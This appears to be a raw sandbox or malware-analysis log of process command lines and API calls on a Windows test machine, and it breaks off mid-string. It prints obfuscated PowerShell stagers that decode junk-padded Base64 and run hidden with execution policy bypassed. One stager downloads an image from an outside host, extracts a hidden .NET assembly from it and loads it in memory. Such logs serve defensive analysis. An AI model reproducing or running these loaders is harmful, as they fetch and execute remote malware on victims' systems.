lBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçbBÇlkoçBvBÇlkoçGEBÇlkoçZBÇlkoçBlBÇlkoçGQBÇlkoçQQBzBÇlkoçHMBÇlkoçZQBtBÇlkoçGIBÇlkoçbBÇlkoçB5BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçVBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçoBÇlkoçCcBÇlkoçRgBpBÇlkoçGIBÇlkoçZQByBÇlkoçC4BÇlkoçSBÇlkoçBvBÇlkoçG0BÇlkoçZQBÇlkoçnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçG0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçdBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçuBÇlkoçEcBÇlkoçZQB0BÇlkoçE0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCgBÇlkoçJwBWBÇlkoçEEBÇlkoçSQBÇlkoçnBÇlkoçCkBÇlkoçLgBJBÇlkoçG4BÇlkoçdgBvBÇlkoçGsBÇlkoçZQBÇlkoçoBÇlkoçCQBÇlkoçbgB1BÇlkoçGwBÇlkoçbBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçWwBvBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBbBÇlkoçF0BÇlkoçXQBÇlkoçgBÇlkoçCgBÇlkoçJwBkBÇlkoçEgBÇlkoçaBÇlkoçBÇlkoçwBÇlkoçEwBÇlkoçbQBÇlkoçxBÇlkoçGkBÇlkoçYgB5BÇlkoçDgBÇlkoçeBÇlkoçBOBÇlkoçFMBÇlkoçNBÇlkoçB6BÇlkoçE0BÇlkoçeQBÇlkoç0BÇlkoçHkBÇlkoçTgBDBÇlkoçDQBÇlkoçegBPBÇlkoçFQBÇlkoçRQB2BÇlkoçEwBÇlkoçegBwBÇlkoçHcBÇlkoçZBÇlkoçBIBÇlkoçFIBÇlkoçbwBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçZBÇlkoçBmBÇlkoçGQBÇlkoçZgBkBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGEBÇlkoçZBÇlkoçBzBÇlkoçGEBÇlkoçJwBÇlkoçgBÇlkoçCwBÇlkoçIBÇlkoçBÇlkoçnBÇlkoçGQBÇlkoçZQBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçYwB1BÇlkoçCcBÇlkoçKQBÇlkoçpBÇlkoçBÇlkoç==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('BÇlkoç','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lm1iby8xNS4zMy4yNC4zOTEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
cmdline powershell -command "$Codigo = 'JBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVQByBÇlkoçGwBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBoBÇlkoçHQBÇlkoçdBÇlkoçBwBÇlkoçHMBÇlkoçOgBÇlkoçvBÇlkoçC8BÇlkoçdQBwBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZBÇlkoçBlBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBuBÇlkoçHMBÇlkoçLgBjBÇlkoçG8BÇlkoçbQBÇlkoçuBÇlkoçGIBÇlkoçcgBÇlkoçvBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBzBÇlkoçC8BÇlkoçMBÇlkoçBÇlkoçwBÇlkoçDQBÇlkoçLwBÇlkoç2BÇlkoçDQBÇlkoçNBÇlkoçBÇlkoçvBÇlkoçDcBÇlkoçNBÇlkoçBÇlkoç5BÇlkoçC8BÇlkoçbwByBÇlkoçGkBÇlkoçZwBpBÇlkoçG4BÇlkoçYQBsBÇlkoçC8BÇlkoçbgBlBÇlkoçHcBÇlkoçXwBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçLgBqBÇlkoçHBÇlkoçBÇlkoçZwBÇlkoç/BÇlkoçDEBÇlkoçNgBÇlkoç5BÇlkoçDgBÇlkoçMBÇlkoçBÇlkoç4BÇlkoçDQBÇlkoçNQBÇlkoçyBÇlkoçDMBÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçdwBlBÇlkoçGIBÇlkoçQwBsBÇlkoçGkBÇlkoçZQBuBÇlkoçHQBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçTgBlBÇlkoçHcBÇlkoçLQBPBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçTgBlBÇlkoçHQBÇlkoçLgBXBÇlkoçGUBÇlkoçYgBDBÇlkoçGwBÇlkoçaQBlBÇlkoçG4BÇlkoçdBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçHcBÇlkoçZQBiBÇlkoçEMBÇlkoçbBÇlkoçBpBÇlkoçGUBÇlkoçbgB0BÇlkoçC4BÇlkoçRBÇlkoçBvBÇlkoçHcBÇlkoçbgBsBÇlkoçG8BÇlkoçYQBkBÇlkoçEQBÇlkoçYQB0BÇlkoçGEBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBVBÇlkoçHIBÇlkoçbBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçuBÇlkoçEUBÇlkoçbgBjBÇlkoçG8BÇlkoçZBÇlkoçBpBÇlkoçG4BÇlkoçZwBdBÇlkoçDoBÇlkoçOgBVBÇlkoçFQBÇlkoçRgBÇlkoç4BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçUwB0BÇlkoçHIBÇlkoçaQBuBÇlkoçGcBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBCBÇlkoçHkBÇlkoçdBÇlkoçBlBÇlkoçHMBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBTBÇlkoçFQBÇlkoçQQBSBÇlkoçFQBÇlkoçPgBÇlkoç+BÇlkoçCcBÇlkoçOwBÇlkoçkBÇlkoçGUBÇlkoçbgBkBÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBFBÇlkoçE4BÇlkoçRBÇlkoçBÇlkoç+BÇlkoçD4BÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBUBÇlkoçGUBÇlkoçeBÇlkoçB0BÇlkoçC4BÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçE8BÇlkoçZgBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçZQBuBÇlkoçGQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçTwBmBÇlkoçCgBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBGBÇlkoçGwBÇlkoçYQBnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçHMBÇlkoçdBÇlkoçBhBÇlkoçHIBÇlkoçdBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçZQBÇlkoçgBÇlkoçDBÇlkoçBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçCsBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçLgBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçYgBhBÇlkoçHMBÇlkoçZQBÇlkoç2BÇlkoçDQBÇlkoçTBÇlkoçBlBÇlkoçG4BÇlkoçZwB0BÇlkoçGgBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBzBÇlkoçHQBÇlkoçYQByBÇlkoçHQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçDsBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBTBÇlkoçHUBÇlkoçYgBzBÇlkoçHQBÇlkoçcgBpBÇlkoçG4BÇlkoçZwBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçQwBvBÇlkoçG4BÇlkoçdgBlBÇlkoçHIBÇlkoçdBÇlkoçBdBÇlkoçDoBÇlkoçOgBGBÇlkoçHIBÇlkoçbwBtBÇlkoçEIBÇlkoçYQBzBÇlkoçGUBÇlkoçNgBÇlkoç0BÇlkoçFMBÇlkoçdBÇlkoçByBÇlkoçGkBÇlkoçbgBnBÇlkoçCgBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZQBkBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçUgBlBÇlkoçGYBÇlkoçbBÇlkoçBlBÇlkoçGMBÇlkoçdBÇlkoçBpBÇlkoçG8BÇlkoçbgBÇlkoçuBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBdBÇlkoçDoBÇlkoçOgBMBÇlkoçG8BÇlkoçYQBkBÇlkoçCgBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçB0BÇlkoçHkBÇlkoçcBÇlkoçBlBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçbBÇlkoçBvBÇlkoçGEBÇlkoçZBÇlkoçBlBÇlkoçGQBÇlkoçQQBzBÇlkoçHMBÇlkoçZQBtBÇlkoçGIBÇlkoçbBÇlkoçB5BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçVBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçoBÇlkoçCcBÇlkoçRgBpBÇlkoçGIBÇlkoçZQByBÇlkoçC4BÇlkoçSBÇlkoçBvBÇlkoçG0BÇlkoçZQBÇlkoçnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçG0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçdBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçuBÇlkoçEcBÇlkoçZQB0BÇlkoçE0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCgBÇlkoçJwBWBÇlkoçEEBÇlkoçSQBÇlkoçnBÇlkoçCkBÇlkoçLgBJBÇlkoçG4BÇlkoçdgBvBÇlkoçGsBÇlkoçZQBÇlkoçoBÇlkoçCQBÇlkoçbgB1BÇlkoçGwBÇlkoçbBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçWwBvBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBbBÇlkoçF0BÇlkoçXQBÇlkoçgBÇlkoçCgBÇlkoçJwBkBÇlkoçEgBÇlkoçaBÇlkoçBÇlkoçwBÇlkoçEwBÇlkoçbQBÇlkoçxBÇlkoçGkBÇlkoçYgB5BÇlkoçDgBÇlkoçeBÇlkoçBOBÇlkoçFMBÇlkoçNBÇlkoçB6BÇlkoçE0BÇlkoçeQBÇlkoç0BÇlkoçHkBÇlkoçTgBDBÇlkoçDQBÇlkoçegBPBÇlkoçFQBÇlkoçRQB2BÇlkoçEwBÇlkoçegBwBÇlkoçHcBÇlkoçZBÇlkoçBIBÇlkoçFIBÇlkoçbwBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçZBÇlkoçBmBÇlkoçGQBÇlkoçZgBkBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGEBÇlkoçZBÇlkoçBzBÇlkoçGEBÇlkoçJwBÇlkoçgBÇlkoçCwBÇlkoçIBÇlkoçBÇlkoçnBÇlkoçGQBÇlkoçZQBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçYwB1BÇlkoçCcBÇlkoçKQBÇlkoçpBÇlkoçBÇlkoç==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('BÇlkoç','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2168
thread_handle: 0x000002f4
process_identifier: 2164
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVQByBÇlkoçGwBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBoBÇlkoçHQBÇlkoçdBÇlkoçBwBÇlkoçHMBÇlkoçOgBÇlkoçvBÇlkoçC8BÇlkoçdQBwBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZBÇlkoçBlBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBuBÇlkoçHMBÇlkoçLgBjBÇlkoçG8BÇlkoçbQBÇlkoçuBÇlkoçGIBÇlkoçcgBÇlkoçvBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBzBÇlkoçC8BÇlkoçMBÇlkoçBÇlkoçwBÇlkoçDQBÇlkoçLwBÇlkoç2BÇlkoçDQBÇlkoçNBÇlkoçBÇlkoçvBÇlkoçDcBÇlkoçNBÇlkoçBÇlkoç5BÇlkoçC8BÇlkoçbwByBÇlkoçGkBÇlkoçZwBpBÇlkoçG4BÇlkoçYQBsBÇlkoçC8BÇlkoçbgBlBÇlkoçHcBÇlkoçXwBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçLgBqBÇlkoçHBÇlkoçBÇlkoçZwBÇlkoç/BÇlkoçDEBÇlkoçNgBÇlkoç5BÇlkoçDgBÇlkoçMBÇlkoçBÇlkoç4BÇlkoçDQBÇlkoçNQBÇlkoçyBÇlkoçDMBÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçdwBlBÇlkoçGIBÇlkoçQwBsBÇlkoçGkBÇlkoçZQBuBÇlkoçHQBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçTgBlBÇlkoçHcBÇlkoçLQBPBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçTgBlBÇlkoçHQBÇlkoçLgBXBÇlkoçGUBÇlkoçYgBDBÇlkoçGwBÇlkoçaQBlBÇlkoçG4BÇlkoçdBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçHcBÇlkoçZQBiBÇlkoçEMBÇlkoçbBÇlkoçBpBÇlkoçGUBÇlkoçbgB0BÇlkoçC4BÇlkoçRBÇlkoçBvBÇlkoçHcBÇlkoçbgBsBÇlkoçG8BÇlkoçYQBkBÇlkoçEQBÇlkoçYQB0BÇlkoçGEBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBVBÇlkoçHIBÇlkoçbBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçuBÇlkoçEUBÇlkoçbgBjBÇlkoçG8BÇlkoçZBÇlkoçBpBÇlkoçG4BÇlkoçZwBdBÇlkoçDoBÇlkoçOgBVBÇlkoçFQBÇlkoçRgBÇlkoç4BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçUwB0BÇlkoçHIBÇlkoçaQBuBÇlkoçGcBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBCBÇlkoçHkBÇlkoçdBÇlkoçBlBÇlkoçHMBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBTBÇlkoçFQBÇlkoçQQBSBÇlkoçFQBÇlkoçPgBÇlkoç+BÇlkoçCcBÇlkoçOwBÇlkoçkBÇlkoçGUBÇlkoçbgBkBÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBFBÇlkoçE4BÇlkoçRBÇlkoçBÇlkoç+BÇlkoçD4BÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBUBÇlkoçGUBÇlkoçeBÇlkoçB0BÇlkoçC4BÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçE8BÇlkoçZgBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçZQBuBÇlkoçGQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçTwBmBÇlkoçCgBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBGBÇlkoçGwBÇlkoçYQBnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçHMBÇlkoçdBÇlkoçBhBÇlkoçHIBÇlkoçdBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçZQBÇlkoçgBÇlkoçDBÇlkoçBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçCsBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçLgBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçYgBhBÇlkoçHMBÇlkoçZQBÇlkoç2BÇlkoçDQBÇlkoçTBÇlkoçBlBÇlkoçG4BÇlkoçZwB0BÇlkoçGgBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBzBÇlkoçHQBÇlkoçYQByBÇlkoçHQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçDsBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBTBÇlkoçHUBÇlkoçYgBzBÇlkoçHQBÇlkoçcgBpBÇlkoçG4BÇlkoçZwBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçQwBvBÇlkoçG4BÇlkoçdgBlBÇlkoçHIBÇlkoçdBÇlkoçBdBÇlkoçDoBÇlkoçOgBGBÇlkoçHIBÇlkoçbwBtBÇlkoçEIBÇlkoçYQBzBÇlkoçGUBÇlko